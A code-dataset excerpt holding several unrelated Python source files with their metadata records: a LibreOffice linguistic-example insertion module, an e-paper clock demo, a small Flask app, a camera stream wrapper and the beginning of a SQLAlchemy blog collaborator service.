unoObjs.document, logger)\n self.msgbox = MessageBox(unoObjs)\n self.settings = ExSettings(self.exType, self.unoObjs, self.userVars)\n self.operations = ExOperations(\n self.exType, self.unoObjs, self.userVars, self.settings)\n self.replacingRefs = True # find and replace ref numbers\n logger.debug(\"ExGrabber init() finished\")\n\n def verifyRefnums(self):\n \"\"\"Raises an exception if there are duplicates or no ref nums found.\"\"\"\n try:\n self.operations.readData(force_read=True)\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n raise exceptions.DataNotFoundError(\"No data found.\")\n if self.operations.duplicate_refnums:\n MAX_NUMS_IN_MESSAGE = 5\n refnums = util.natural_sort(self.operations.duplicate_refnums)\n refnumsString = \", \".join(refnums[:MAX_NUMS_IN_MESSAGE])\n 
additionalRefs = len(refnums) - MAX_NUMS_IN_MESSAGE\n if additionalRefs > 0:\n refnumsString += \", ...%d more.\" % additionalRefs\n message = exceptions.interpolate_message(\n \"The following Ref Numbers have duplicates: %s\", refnumsString)\n if self.exType == EXTYPE_INTERLINEAR:\n message += exceptions.interpolate_message(\n \"\\n\\nEither change the numbers or, if they are in \"\n \"different texts, add a prefix for each text.\\n\"\n \"Press OK to use these settings anyway.\")\n raise exceptions.DataInconsistentError(message)\n\n def getAllRefnums(self):\n \"\"\"Returns an iterable of all ref numbers in the data.\n Items are in the order that they were read from the file.\n \"\"\"\n try:\n self.operations.readData()\n return util.natural_sort(\n [ex.refText for ex in self.operations.examplesDict.values()])\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n raise exceptions.DataNotFoundError(\"No data found.\")\n\n def insertByRefnum(self, refTextRough):\n try:\n self.operations.readData()\n if not refTextRough.strip():\n message = exceptions.interpolate_message(\n \"Please enter a ref number.\")\n raise exceptions.ChoiceProblem(\n self.operations.appendSuggestions(message))\n logger.debug(\"do the insertion.\")\n self.operations.insertEx(refTextRough, False, False)\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n\n def setUpdateExamples(self, newVal):\n self.replacingRefs = not newVal\n\n def isUpdatingExamples(self):\n return not self.replacingRefs\n\n def findNext(self, searchFromBeginning):\n \"\"\"Returns true if a ref number is found.\"\"\"\n logger.debug(\"findNext(%s)\", searchFromBeginning)\n oldFoundString = self.operations.getFoundString()\n newFoundString = self.operations.doSearch(\n self.replacingRefs, searchFromBeginning)\n if oldFoundString and not newFoundString:\n return bool(oldFoundString)\n return bool(newFoundString)\n\n def replace(self, searchFromBeginning):\n \"\"\"Returns True if another ref number is found after replacing.\"\"\"\n logger.debug(util.funcName('begin'))\n if (self.exType == EXTYPE_INTERLINEAR and self.isUpdatingExamples() and\n not self.settings.getOutconfig().makeOuterTable):\n self.msgbox.display(\n \"To update examples, 'Outer table' must be \"\n \"marked in Interlinear Settings.\")\n return False\n if not self.operations.getFoundString():\n return self.findNext(searchFromBeginning)\n refnumFound = self.operations.getFoundString()\n try:\n self.operations.readData()\n if self.replacingRefs:\n self.operations.insertEx(refnumFound, True, False)\n else:\n self.operations.updateEx(refnumFound)\n self.operations.doSearch(self.replacingRefs, False)\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n return bool(self.operations.getFoundString())\n\n def replaceAll(self):\n \"\"\"Replace all #ref no's or update all existing examples.\"\"\"\n if (self.exType == EXTYPE_INTERLINEAR and self.isUpdatingExamples() and\n not self.settings.getOutconfig().makeOuterTable):\n self.msgbox.display(\n \"To update examples, 'Outer table' must be \"\n \"marked in Interlinear Settings.\")\n return\n try:\n self.operations.readData()\n repeater = ExRepeater(\n self.msgbox, self.settings, self.operations,\n self.replacingRefs)\n repeater.replaceAll()\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n\n def addExampleNumbers(self):\n self.operations.addExampleNumbers()\n\n\nclass ExRepeater:\n \"\"\"For replacing or updating all.\"\"\"\n def __init__(self, msgbox, settings, 
operations, replacingRefs):\n self.msgbox = msgbox\n self.settings = settings\n self.operations = operations\n self.replacingRefs = replacingRefs\n self.prevRefUpdated = \"\"\n self.repeatedCount = 0\n self.replacementsCount = 0\n self.messagesDisplayed = [] # don't keep displaying for updating all\n\n def replaceAll(self):\n startFromBeginning = True\n self.prevRefUpdated = \"\"\n self.repeatedCount = 0\n self.replacementsCount = 0\n while True:\n self.operations.doSearch(\n self.replacingRefs, startFromBeginning, True)\n refnumFound = self.operations.getFoundString()\n if not refnumFound:\n break\n startFromBeginning = False\n try:\n self.replaceAndAsk(refnumFound)\n except exceptions.UserInterrupt:\n break\n except exceptions.MessageError as exc:\n if exc.msg not in self.messagesDisplayed:\n self.messagesDisplayed.append(exc.msg)\n if not self.msgbox.displayOkCancel(exc.msg, *exc.msg_args):\n # User pressed Cancel\n break\n plural = \"\" if self.replacementsCount == 1 else \"s\"\n if self.replacingRefs:\n self.msgbox.display(\n \"Replaced %d example%s.\", self.replacementsCount, plural)\n else:\n self.msgbox.display(\n \"Updated %d example%s.\", self.replacementsCount, plural)\n\n def replaceAndAsk(self, refnumFound):\n if self.replacingRefs:\n self.operations.insertEx(refnumFound, True, False)\n self.replacementsCount += 1\n else:\n self.operations.updateEx(refnumFound)\n self.replacementsCount += 1\n if refnumFound == self.prevRefUpdated:\n self.askInterrupt(refnumFound)\n else:\n self.prevRefUpdated = refnumFound\n self.repeatedCount = 1\n\n def askInterrupt(self, refnumFound):\n \"\"\"Updated the same number twice. It might be an infinite loop.\"\"\"\n logger.debug(\"Repeated ex %d times\", self.repeatedCount)\n self.repeatedCount += 1\n MAX_REPETITIONS = 5\n dummy_div, mod = divmod(self.repeatedCount, MAX_REPETITIONS)\n if self.repeatedCount > 0 and mod == 0:\n refnumDisplay = refnumFound.strip()\n if not self.msgbox.displayOkCancel(\n \"Updated '%s' %d times in a row. 
Keep going?\",\n refnumDisplay, self.repeatedCount):\n raise exceptions.UserInterrupt()\n\n\nclass ExOperations:\n \"\"\"Core operations for this module.\n Calls the Access layer for input and output.\n \"\"\"\n def __init__(self, exType, unoObjs, userVars, settings):\n self.exType = exType\n self.unoObjs = unoObjs\n self.userVars = userVars\n self.settings = settings\n self.search = search.ExampleSearch(unoObjs)\n self.interlinManager = None\n if self.exType == EXTYPE_PHONOLOGY:\n self.outputManager = outputmanager.PhonMgr(\n unoObjs, self.settings.getStyles())\n else:\n self.interlinManager = outputmanager.InterlinMgr(\n unoObjs, self.settings.getStyles())\n self.outputManager = self.interlinManager\n self.exUpdater = ExUpdater(\n unoObjs, self.outputManager, self.userVars.VAR_PREFIX)\n self.msgbox = MessageBox(unoObjs)\n self.examplesDict = None\n self.suggestions = []\n self.duplicate_refnums = []\n\n def addExampleNumbers(self):\n if self.interlinManager:\n self.interlinManager.addExampleNumbers()\n\n def doSearch(self, replacingRefs, startFromBeginning, findingAll=False):\n if replacingRefs:\n self.search.findRefNumber(startFromBeginning, findingAll)\n else:\n self.search.findRefCharStyle(\n self.settings.getStyles().getNames()['ref'],\n startFromBeginning, findingAll)\n return self.getFoundString()\n\n def getFoundString(self):\n return self.search.getFoundString()\n\n def readData(self, force_read=False):\n \"\"\"Read examples from data files.\"\"\"\n if force_read:\n self.examplesDict = None\n self.settings.reset()\n if self.examplesDict is None:\n logger.debug(\"Getting examples dict\")\n if self.exType == EXTYPE_PHONOLOGY:\n fileReader = PhonReader(\n self.unoObjs, self.userVars, self.settings.getInconfig())\n else:\n fileReader = InterlinReader(\n self.unoObjs, self.userVars, self.settings.getInconfig())\n self.examplesDict = fileReader.read()\n self.suggestions = fileReader.getSuggestions()\n self.duplicate_refnums = fileReader.getDuplicateRefNumbers()\n\n def insertEx(self, refTextRough, deleteRefNum, updatingEx):\n \"\"\"Set updatingEx to True if updating the example.\"\"\"\n logger.debug(util.funcName('begin', args=refTextRough))\n logger.debug(\"%d examples\", len(self.examplesDict))\n refnum = refTextRough.strip()\n if refnum.startswith(\"#\"):\n refnum = refnum[1:] # keep all but first character\n\n ## Select the specified ref number\n\n refnum_key = refnum.lower() # case insensitive\n if refnum_key in self.examplesDict:\n logger.debug(\n \"Inserting '%s'\", self.examplesDict[refnum_key].refText)\n\n ## Display the data in the Writer doc\n\n if updatingEx:\n self.exUpdater.gotoAfterEx()\n self.outputManager.setConfig(self.settings.getOutconfig())\n self.outputManager.outputExample(\n self.examplesDict[refnum_key], deleteRefNum, updatingEx)\n else:\n message = exceptions.interpolate_message(\n \"Could not find ref number %s\", [refnum])\n raise exceptions.DataNotFoundError(\n self.appendSuggestions(message))\n\n def appendSuggestions(self, message):\n \"\"\"Append suggestion ref numbers to a message.\n\n :param message: the main part of the message\n :returns: the localized message string with suggestions added\n \"\"\"\n if not self.suggestions:\n return message\n suggNum = 0\n suggString = \"\"\n MAX_SUGGESTIONS = 3\n for suggestion in self.suggestions:\n suggNum += 1\n if suggNum > MAX_SUGGESTIONS:\n break\n suggString += \"\\t%s\\n\" % suggestion\n suggestion_message = exceptions.interpolate_message(\n \"\\n\\nSuggestions\\n%s\", [suggString])\n return message + 
suggestion_message\n\n def updateEx(self, refTextRough):\n \"\"\"This method gets called after a ref number to update has been\n selected in the document. The order of the next few steps is:\n 1. Call gotoAfterEx() to move out of the table.\n 2. Insert the new example without the example number.\n 3. Call moveExNumber().\n Steps 1 and 2 are done in insertEx().\n \"\"\"\n logger.debug(util.funcName('begin'))\n if self.exType == EXTYPE_INTERLINEAR:\n if not self.search.refInTable():\n raise exceptions.RangeError(\n \"Found a ref number, but it must be in an outer \"\n \"table in order to be updated.\")\n self.insertEx(refTextRough, False, True)\n if self.exType == EXTYPE_INTERLINEAR:\n if not self.settings.showCompDoc():\n self.exUpdater.doNotMakeCompDoc()\n self.exUpdater.moveExNumber()\n self.exUpdater.moveExamplesToNewDoc()\n else:\n self.exUpdater.deleteOldPhonEx()\n\n\nclass ExSettings:\n \"\"\"Phonology or interlinear settings from user vars. Loads on demand.\"\"\"\n def __init__(self, exType, unoObjs, userVars):\n self.exType = exType\n self.unoObjs = unoObjs\n self.userVars = userVars\n self.msgbox = MessageBox(unoObjs)\n self.styles = None\n self.inSettings = None\n self.outSettings = None\n self.showComparisonDoc = None\n self.fileList = []\n\n def getStyles(self):\n if not self.styles:\n if self.exType == EXTYPE_PHONOLOGY:\n self.styles = styles.PhonologyStyles(\n self.unoObjs, self.userVars)\n else:\n self.styles = styles.InterlinStyles(\n self.unoObjs, self.userVars)\n return self.styles\n\n def getInconfig(self):\n self._loadSettings()\n return self.inSettings\n\n def getOutconfig(self):\n self._loadSettings()\n return self.outSettings\n\n def showCompDoc(self):\n if self.showComparisonDoc is None:\n self.showComparisonDoc = True\n varname = \"ComparisonDoc\"\n if not self.userVars.isEmpty(varname):\n if self.userVars.getInt(varname) == 0:\n self.showComparisonDoc = False\n return self.showComparisonDoc\n\n def reset(self):\n \"\"\"Call this to allow settings to be reloaded.\"\"\"\n self.inSettings = None\n self.outSettings = None\n\n def _loadSettings(self):\n if self.outSettings:\n return\n if self.exType == EXTYPE_PHONOLOGY:\n self._getPhonologySettings()\n else:\n self._getInterlinSettings()\n\n def _getPhonologySettings(self):\n \"\"\"Get file paths, style names, and other options that were\n set in the Phonology Settings dialog.\n \"\"\"\n logger.debug(util.funcName('begin'))\n self.inSettings = lingex_structs.PhonInputSettings(self.userVars)\n self.inSettings.loadUserVars()\n self.outSettings = lingex_structs.PhonOutputSettings(self.userVars)\n self.outSettings.loadUserVars()\n logger.debug(util.funcName('end'))\n\n def _getInterlinSettings(self):\n \"\"\"Get file paths, style names, and other options from user vars.\"\"\"\n logger.debug(util.funcName('begin'))\n self.outSettings = lingex_structs.InterlinOutputSettings(self.userVars)\n self.outSettings.loadUserVars()\n self.inSettings = fileitemlist.InterlinInputSettings(self.userVars)\n self.inSettings.loadUserVars()\n self.inSettings.loadOutputSettings(self.outSettings)\n logger.debug(\"Using %d file(s).\", len(self.inSettings.fileList))\n logger.debug(util.funcName('end'))\n", "repo_name": "silnrsi/libreoffice-linguistic-tools", "sub_path": "LinguisticTools/pythonpath/lingt/app/svc/lingexamples.py", "file_name": "lingexamples.py", "file_ext": "py", "file_size_in_byte": 17097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "88", "api": [{"api_name": 
"logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "lingt.access.writer.uservars.Prefix.PHONOLOGY", "line_number": 39, "usage_type": "attribute"}, {"api_name": "lingt.access.writer.uservars.Prefix", "line_number": 39, "usage_type": "name"}, {"api_name": "lingt.access.writer.uservars.Prefix.INTERLINEAR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "lingt.access.writer.uservars.Prefix", "line_number": 41, "usage_type": "name"}, {"api_name": "lingt.access.writer.uservars.UserVars", "line_number": 42, "usage_type": "call"}, {"api_name": "lingt.ui.common.messagebox.MessageBox", "line_number": 44, "usage_type": "call"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 55, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 55, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataNotFoundError", "line_number": 57, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 57, "usage_type": "name"}, {"api_name": "lingt.utils.util.natural_sort", "line_number": 60, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 60, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 65, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 65, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 68, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 68, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataInconsistentError", "line_number": 72, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 72, "usage_type": "name"}, {"api_name": "lingt.utils.util.natural_sort", "line_number": 80, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 80, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 82, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 82, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataNotFoundError", "line_number": 84, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 84, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 90, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 90, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.ChoiceProblem", "line_number": 92, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 92, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 96, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 96, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 117, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 117, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 134, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 134, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 152, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 152, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.UserInterrupt", "line_number": 185, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 185, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 187, "usage_type": "attribute"}, 
{"api_name": "lingt.app.exceptions", "line_number": 187, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.UserInterrupt", "line_number": 225, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 225, "usage_type": "name"}, {"api_name": "lingt.access.writer.search.ExampleSearch", "line_number": 237, "usage_type": "call"}, {"api_name": "lingt.access.writer.search", "line_number": 237, "usage_type": "name"}, {"api_name": "lingt.access.writer.outputmanager.PhonMgr", "line_number": 240, "usage_type": "call"}, {"api_name": "lingt.access.writer.outputmanager", "line_number": 240, "usage_type": "name"}, {"api_name": "lingt.access.writer.outputmanager.InterlinMgr", "line_number": 243, "usage_type": "call"}, {"api_name": "lingt.access.writer.outputmanager", "line_number": 243, "usage_type": "name"}, {"api_name": "lingt.access.writer.ex_updater.ExUpdater", "line_number": 246, "usage_type": "call"}, {"api_name": "lingt.ui.common.messagebox.MessageBox", "line_number": 248, "usage_type": "call"}, {"api_name": "lingt.access.xml.phon_reader.PhonReader", "line_number": 277, "usage_type": "call"}, {"api_name": "lingt.access.xml.interlin_reader.InterlinReader", "line_number": 280, "usage_type": "call"}, {"api_name": "lingt.utils.util.funcName", "line_number": 288, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 288, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 309, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 309, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataNotFoundError", "line_number": 311, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 311, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 330, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 330, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 342, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 342, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.RangeError", "line_number": 345, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 345, "usage_type": "name"}, {"api_name": "lingt.ui.common.messagebox.MessageBox", "line_number": 364, "usage_type": "call"}, {"api_name": "lingt.access.writer.styles.PhonologyStyles", "line_number": 374, "usage_type": "call"}, {"api_name": "lingt.access.writer.styles", "line_number": 374, "usage_type": "name"}, {"api_name": "lingt.access.writer.styles.InterlinStyles", "line_number": 377, "usage_type": "call"}, {"api_name": "lingt.access.writer.styles", "line_number": 377, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 415, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 415, "usage_type": "name"}, {"api_name": "lingt.app.data.lingex_structs.PhonInputSettings", "line_number": 416, "usage_type": "call"}, {"api_name": "lingt.app.data.lingex_structs", "line_number": 416, "usage_type": "name"}, {"api_name": "lingt.app.data.lingex_structs.PhonOutputSettings", "line_number": 418, "usage_type": "call"}, {"api_name": "lingt.app.data.lingex_structs", "line_number": 418, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 420, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 420, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 424, "usage_type": "call"}, {"api_name": 
"lingt.utils.util", "line_number": 424, "usage_type": "name"}, {"api_name": "lingt.app.data.lingex_structs.InterlinOutputSettings", "line_number": 425, "usage_type": "call"}, {"api_name": "lingt.app.data.lingex_structs", "line_number": 425, "usage_type": "name"}, {"api_name": "lingt.app.data.fileitemlist.InterlinInputSettings", "line_number": 427, "usage_type": "call"}, {"api_name": "lingt.app.data.fileitemlist", "line_number": 427, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 431, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 431, "usage_type": "name"}]} +{"seq_id": "4944133535", "text": "import sys\nimport os\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom datetime import datetime\nimport time\nfrom EPD import EPD\n\nWHITE = 1\nBLACK = 0\n\n# fonts are in different places on Raspbian/Angstrom so search\npossible_fonts = [\n '/usr/share/fonts/truetype/ttf-dejavu/DejaVuSansMono-Bold.ttf', # R.Pi\n '/usr/share/fonts/truetype/freefont/FreeMono.ttf', # R.Pi\n '/usr/share/fonts/truetype/LiberationMono-Bold.ttf', # B.B\n '/usr/share/fonts/truetype/DejaVuSansMono-Bold.ttf', # B.B\n '/usr/share/fonts/TTF/FreeMonoBold.ttf', # Arch\n '/usr/share/fonts/TTF/DejaVuSans-Bold.ttf' # Arch\n]\n\n\nFONT_FILE = ''\nfor f in possible_fonts:\n if os.path.exists(f):\n FONT_FILE = f\n break\n\nif '' == FONT_FILE:\n raise 'no font file found'\n\nCLOCK_FONT_SIZE = 40\nDATE_FONT_SIZE = 30\n\nMAX_START = 0xffff\n\ndef main(argv):\n \"\"\"main program - draw and display a test image\"\"\"\n\n epd = EPD()\n\n print('panel = {p:s} {w:d} x {h:d} version={v:s} COG={g:d} FILM={f:d}'.format(p=epd.panel, w=epd.width, h=epd.height, v=epd.version, g=epd.cog, f=epd.film))\n\n epd.clear()\n\n demo(epd)\n\n\ndef demo(epd):\n \"\"\"simple partial update demo - draw draw a clock\"\"\"\n\n # initially set all white background\n image = Image.new('1', epd.size, WHITE)\n\n # prepare for drawing\n draw = ImageDraw.Draw(image)\n width, height = image.size\n\n clock_font = ImageFont.truetype(FONT_FILE, CLOCK_FONT_SIZE)\n date_font = ImageFont.truetype(FONT_FILE, DATE_FONT_SIZE)\n\n # clear the display buffer\n draw.rectangle((0, 0, width, height), fill=WHITE, outline=WHITE)\n previous_second = 0\n previous_day = 0\n\n while True:\n while True:\n now = datetime.today()\n if now.second % 5 == 0:\n break\n time.sleep(0.5)\n\n if now.day != previous_day:\n draw.rectangle((2, 2, width - 2, height - 2), fill=WHITE, outline=BLACK)\n draw.text((10, 55), '{y:04d}-{m:02d}-{d:02d}'.format(y=now.year, m=now.month, d=now.day), fill=BLACK, font=date_font)\n previous_day = now.day\n else:\n draw.rectangle((5, 10, width - 5, 10 + CLOCK_FONT_SIZE), fill=WHITE, outline=WHITE)\n\n draw.text((5, 10), '{h:02d}:{m:02d}:{s:02d}'.format(h=now.hour, m=now.minute, s=now.second), fill=BLACK, font=clock_font)\n\n # display image on the panel\n epd.display(image)\n if now.second < previous_second:\n epd.update() # full update every minute\n else:\n epd.partial_update()\n previous_second = now.second\n\n# main\nif \"__main__\" == __name__:\n if len(sys.argv) < 1:\n sys.exit('usage: {p:s}'.format(p=sys.argv[0]))\n\n try:\n main(sys.argv[1:])\n except KeyboardInterrupt:\n sys.exit('interrupted')\n pass\n", "repo_name": "repaper/gratis", "sub_path": "PlatformWithOS/demo/ClockDemo.py", "file_name": "ClockDemo.py", "file_ext": "py", "file_size_in_byte": 2909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 239, "dataset": "github-code", "pt": "86", "api": 
[{"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "EPD.EPD", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 61, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 61, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "37309573311", "text": "from flask import Flask\nfrom flask_bismillah import Bismillah\n\napp = Flask(__name__)\n\nb = Bismillah()\nb.init_app(app)\n\n@app.route('/')\ndef bismillah():\n return \"Bismillah Project \" + b.print_me()\n\n\nif __name__ == '__main__':\n app.run()", "repo_name": "hmtmcse/flask-exp", "sub_path": "extension/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 241, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask_bismillah.Bismillah", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "30092047758", "text": "# Python-specific imports\nfrom imutils.video import VideoStream\n\nclass Camera:\n\n\t\"\"\"\n\t\turl: The camera url passed in\n\t\tROI: A list containing all of the coordinates of the Bounding Box.\n\t\tVS: A VideoStream object that streams from the camera url\n\t\tdimensions: A list containing the width and height of each frame we would receive.\n\t\tprepare_ratio: A list containing the ratio of the original frame to the frame that's resized when the frame is preparing for it to be displayed.\n\t\tfrontend_ratio: A list containing the ratio of the original frame to the frame that's resized when the frame is displayed on the frontend.\n\t\tcar_count: number of cars that have passed by this camera\n\t\"\"\"\n\n\tdef __init__(self, url):\n\t\t\"\"\"\n\t\t\tBasic setup of the object, instanstiates url and starts a new video stream\n\t\t\"\"\"\n\t\tself.url = url\n\t\tself.ROI = None\n\t\tself.car_count = 0\n\t\t#self.frame_delay = 5\n\t\tself.initialize_video_stream(url)\n\n\tdef __iter__(self):\n\t\t\"\"\"\n\t\t\tOverwrites the default iter function so that you can iterate through this camera.\n\t\t\"\"\"\n\t\treturn CameraIterator(self)\n\n\tdef __repr__(self):\n\t\t\"\"\"\n\t\t\tString representation of the object.\n\t\t\"\"\"\n\t\treturn 'URL: {}, ROI: {}'.format(self.url,self.ROI)\n\n\tdef set_roi_coordinates(self, coordinates):\n\t\t\"\"\"\n\t\t\tUpdates Region of Interest(ROI) with the coordinates specified 
from the frontend.\n\t\t"""\n\t\tself.ROI = coordinates\n\n\tdef build_video_stream(self, camera_url):\n\t\t# Build Stream\n\t\tself.VS = VideoStream(src=camera_url).start()\n\t\tsample_frame = self.VS.read()\n\t\treturn sample_frame\n\n\tdef initialize_video_stream(self,camera_url):\n\t\t"""\n\t\t\tGiven a camera url, build a stream object and get the dimensions of it.\n\t\t"""\n\n\t\t# If we are not able to read a proper frame from the stream, this will fail.\n\t\tsample_frame = self.build_video_stream(camera_url)\n\t\tassert sample_frame is not None\n\n\t\t# Set the width and height.\n\t\tself.dimensions = sample_frame.shape\n\t\tself.prepare_ratio = [800/self.dimensions[0],1]\n\t\tself.frontend_ratio = [450/(self.dimensions[0]*self.prepare_ratio[0]),800/(self.dimensions[1]*self.prepare_ratio[1])]\n\n\tdef stop_video_stream(self):\n\t\t"""\n\t\t\tTurns off the Video Stream\n\t\t"""\n\t\tself.VS.stop()\n\nclass CameraIterator:\n\t"""\n\t\tThis object is created so that you can iterate through a camera object\n\t"""\n\n\tdef __init__(self, camera):\n\t\t"""\n\t\t\tBasic setup of iterator object.\n\t\t"""\n\t\tself.camera = camera\n\n\tdef __next__(self):\n\t\t"""\n\t\t\tAllows iterating over this object to get each frame. Ex: "for frame in camera..."\n\t\t"""\n\n\t\t# If we are not able to read a proper frame from the stream, this will fail.\n\t\tframe = self.camera.VS.read()\n\t\n\t\trestartCount = 0\n\t\twhile frame is None:\n\t\t\tif restartCount == 5:\n\t\t\t\traise Exception("Frame is None")\n\t\t\tself.camera.initialize_video_stream(self.camera.url)\n\t\t\tframe = self.camera.VS.read()\n\t\t\trestartCount+=1\n\t\t\n\t\treturn frame\n\n\t\t\n"""\n\tTesting to check for how long it takes to run\n"""\nif __name__ == '__main__':\n\tsample = Camera(url = 0)\n\ti = 0\n\tfor frame in sample:\n\t\tif i > 3000:\n\t\t\tbreak\n\t\tprint("FROM CAMERA: " + str(frame))\n\t\ti += 1\n", "repo_name": "delphidisplay/CameraBasedSensor-OLD", "sub_path": "camera.py", "file_name": "camera.py", "file_ext": "py", "file_size_in_byte": 3035, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "imutils.video.VideoStream", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "23111207242", "text": "from ..api.blog_collaborator import IBlogCollaboratorService\nfrom ally.container.ioc import injected\nfrom livedesk.meta.blog_collaborator import BlogCollaboratorMapped, \\\n    BlogCollaboratorEntry\nfrom superdesk.person.meta.person import PersonMapped\nfrom superdesk.source.meta.source import SourceMapped\nfrom sqlalchemy.exc import OperationalError\nfrom ally.exception import InputError, Ref\nfrom ally.internationalization import _\nfrom ally.support.sqlalchemy.session import SessionSupport\nfrom ally.container.support import setup\nfrom sqlalchemy.orm.exc import NoResultFound\n\n# --------------------------------------------------------------------\n\n@injected\n@setup(IBlogCollaboratorService)\nclass BlogCollaboratorServiceAlchemy(SessionSupport, IBlogCollaboratorService):\n    '''\n    Implementation for @see: IBlogCollaboratorService\n    '''\n\n    def __init__(self):\n        '''\n        Construct the blog collaborator service.\n        '''\n\n    def getById(self, blogId, collaboratorId):\n        '''\n        @see: IBlogCollaboratorService.getById\n        '''\n        sql = self.session().query(BlogCollaboratorMapped)\n        sql = sql.filter(BlogCollaboratorMapped.Blog == blogId)\n        sql = sql.filter(BlogCollaboratorMapped.Id == collaboratorId)\n\n        try: 
